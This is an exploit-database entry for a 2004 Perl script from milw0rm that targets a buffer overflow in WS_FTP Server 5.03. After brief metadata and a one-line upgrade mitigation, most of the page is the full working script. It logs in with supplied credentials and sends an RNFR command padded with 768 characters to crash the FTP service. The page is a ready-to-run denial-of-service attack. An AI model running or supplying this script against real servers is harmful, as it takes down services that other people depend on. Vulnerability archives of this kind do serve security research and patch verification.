WS_FTP_Overflow.pl

vendor:

WS_FTP Server

by:

milw0rm.com

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: WS_FTP Server

Affected Version From: 05.03

Affected Version To: 05.03

Patch Exists: YES

Related CWE: N/A

CPE: a:ipswitch:ws_ftp_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2004

This exploit is for a buffer overflow vulnerability in WS_FTP Server Version 5.03. The exploit sends a specially crafted 'RNFR' command with an overly long argument to the FTP server, which causes a buffer overflow and crashes the service.

Mitigation:

Upgrade to the latest version of WS_FTP Server.

Source

Exploit-DB raw data:

#===== Start WS_FTP_Overflow.pl =====
#
# Usage: WS_FTP_Overflow.pl <ip> <ftp user> <ftp pass>
#        WS_FTP_Overflow.pl 127.0.0.1 hello moto
#
# WS_FTP Server Version 5.03, 2004.10.14
#
# Download:
# http://www.ipswitch.com/
#
######################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "21",
                                    Proto    => "TCP"))
{
        print "Attempting to kill WS_FTP Server service at $ARGV[0]:21...";

        sleep(1);

        print $socket "USER $ARGV[1]\r\n";

        sleep(1);

        print $socket "PASS $ARGV[2]\r\n";

        sleep(1);

        print $socket "PORT 127,0,0,1,18,12\r\n";

        sleep(1);

        print $socket "RNFR " . "A" x 768 . "\r\n";

        close($socket);
}
else
{
        print "Cannot connect to $ARGV[0]:21\n";
}
#===== End WS_FTP_Overflow.pl =====

# milw0rm.com [2004-11-29]